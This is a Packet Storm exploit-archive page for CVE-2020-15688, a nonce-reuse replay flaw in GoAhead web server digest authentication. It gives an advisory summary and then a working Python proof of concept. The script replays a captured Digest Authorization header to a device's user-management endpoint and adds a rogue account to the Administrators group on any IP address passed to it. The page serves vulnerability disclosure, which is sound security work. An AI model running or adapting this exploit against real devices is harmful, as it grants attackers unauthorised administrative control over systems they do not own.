exploit the possibilities

EmbedThis GoAhead Web Server 5.1.1 Digest Authentication Capture Replay Nonce Reuse

EmbedThis GoAhead Web Server 5.1.1 Digest Authentication Capture Replay Nonce Reuse
Posted Oct 7, 2020
Authored by LiquidWorm | Site zeroscience.mk

A security vulnerability affecting GoAhead versions 2 to 5 has been identified when using Digest authentication over HTTP. The HTTP Digest Authentication in the GoAhead web server does not completely protect against replay attacks. This allows an unauthenticated remote attacker to bypass authentication via capture-replay if TLS is not used to protect the underlying communication channel. Digest authentication uses a "nonce" value to mitigate replay attacks. GoAhead versions 3 to 5 validated the nonce with a fixed duration of 5 minutes which permitted short-period replays. This duration is too long for most implementations.

tags | exploit, remote, web
advisories | CVE-2020-15688
MD5 | b8446c244573df9229e023dd4a04307d

EmbedThis GoAhead Web Server 5.1.1 Digest Authentication Capture Replay Nonce Reuse

Change Mirror Download
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# EmbedThis GoAhead Web Server 5.1.1 Digest Authentication Capture Replay Nonce Reuse
#
#
# Vendor: Embedthis Software LLC
# Product web page: https://www.embedthis.com
# Affected version: <=5.1.1 and <=4.1.2
# Fixed version: >=5.1.2 and >=4.1.3
#
# Summary: GoAhead is the world's most popular, tiny embedded web server. It is compact,
# secure and simple to use. GoAhead is deployed in hundreds of millions of devices and is
# ideal for the smallest of embedded devices.
#
# Desc: A security vulnerability affecting GoAhead versions 2 to 5 has been identified when
# using Digest authentication over HTTP. The HTTP Digest Authentication in the GoAhead web
# server does not completely protect against replay attacks. This allows an unauthenticated
# remote attacker to bypass authentication via capture-replay if TLS is not used to protect
# the underlying communication channel. Digest authentication uses a "nonce" value to mitigate
# replay attacks. GoAhead versions 3 to 5 validated the nonce with a fixed duration of 5 minutes
# which permitted short-period replays. This duration is too long for most implementations.
#
# Tested on: GoAhead-http
# GoAhead-Webs
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2020-5598
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5598.php
#
# CVE ID: CVE-2020-15688
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15688
# https://nvd.nist.gov/vuln/detail/CVE-2020-15688
#
# CWE ID: CWE-294 Authentication Bypass by Capture-replay
# CWE URL: https://cwe.mitre.org/data/definitions/294.html
#
# CWE ID: CWE-323: Reusing a Nonce, Key Pair in Encryption
# CWE URL: https://cwe.mitre.org/data/definitions/323.html
#
# GoAhead Security Alerts / Fix:
# https://github.com/embedthis/goahead-gpl/issues/3
# https://github.com/embedthis/goahead-gpl/issues/2
# https://github.com/embedthis/goahead-gpl/commit/fe0662f945bd7e24b8d621929e1b93d8a7f3f08f#diff-0988df549d878c849d7f2c073319bcb2
#
#
# 29.08.2019
#


#
# PoC for a network controller running GoAhead web server.
# Replay Authentication Bypass / Create Admin User
#

import requests
import sys#####

if (len(sys.argv) <= 1):
print("Usage: ./nen.py <ipaddress>")
exit(0)

ip = sys.argv[1]

url = "http://"+ip+"/goform/formUserManagementAdd?lang=en"
kolache = {"lang":"en"}

replay = "Digest username=\"admin\", "
replay += "realm=\"GoAhead\", "
replay += "nonce=\"5fb3ce6dec423bf8b8f0dfc8cf65244d\", "
replay += "uri=\"/goform/formUserManagementAdd?lang=en\", "
replay += "algorithm=MD5, "
replay += "response=\"1c05f4d08aa0cfcc5318882e0fb4e9af\", "
replay += "opaque=\"5ccc069c403ebaf9f0171e9517f40e41\", "
replay += "qop=auth, "
replay += "nc=0000000a, "
replay += "cnonce=\"0649f631320f23bb\""

headers = {"Cache-Control": "max-age=0",
"Authorization": replay,
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "NoProxy/NoProblem.251",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "mk-MK;q=0.9,mk;q=0.8",
"Connection": "close"}

data = {"FormSubmitCause": "button",
"DefinitionAction": "add",
"Define_admin_ID": "admin",
"Define_admin_Name": "admin",
"Define________Action________ID": '',
"Define________Action________Name": "testingus",
"Define________Action________Password": "testingus",
"Define________Action________Group": "Administrators"}

requests.post(url, headers=headers, cookies=kolache, data=data)

print("Finito")
Login or Register to add favorites

File Archive:

January 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    4 Files
  • 2
    Jan 2nd
    3 Files
  • 3
    Jan 3rd
    3 Files
  • 4
    Jan 4th
    33 Files
  • 5
    Jan 5th
    31 Files
  • 6
    Jan 6th
    21 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    19 Files
  • 9
    Jan 9th
    1 Files
  • 10
    Jan 10th
    1 Files
  • 11
    Jan 11th
    33 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    27 Files
  • 14
    Jan 14th
    8 Files
  • 15
    Jan 15th
    16 Files
  • 16
    Jan 16th
    0 Files
  • 17
    Jan 17th
    0 Files
  • 18
    Jan 18th
    0 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close